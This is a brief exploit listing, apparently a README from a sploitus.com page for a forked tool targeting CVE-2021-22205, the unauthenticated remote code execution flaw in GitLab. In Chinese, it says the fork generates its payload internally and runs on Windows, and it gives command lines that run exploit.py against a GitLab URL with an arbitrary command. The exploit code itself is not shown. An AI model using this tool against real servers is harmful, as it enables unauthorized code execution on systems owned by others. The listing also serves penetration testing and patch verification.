Exploit for Code Injection in Gitlab CVE-2021-22205

## https://sploitus.com/exploit?id=82ABA9A8-11DC-5940-A195-1CF159D70E81
# CVE-2021-22205

> 基于 [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205) 的Fork

## 简介
CVE-2021-22205: Gitlab 未授权远程代码执行漏洞 EXP

移除了对djvumake & djvulibre的依赖，直接内部生成payload，可在win平台执行。


## 使用方法

```shell
# 需要授权
python3 exploit.py -u <username> -p <password> -t <gitlab_url> -c <command>
# 未授权
python3 exploit.py -t <gitlab_url> -c <command>
```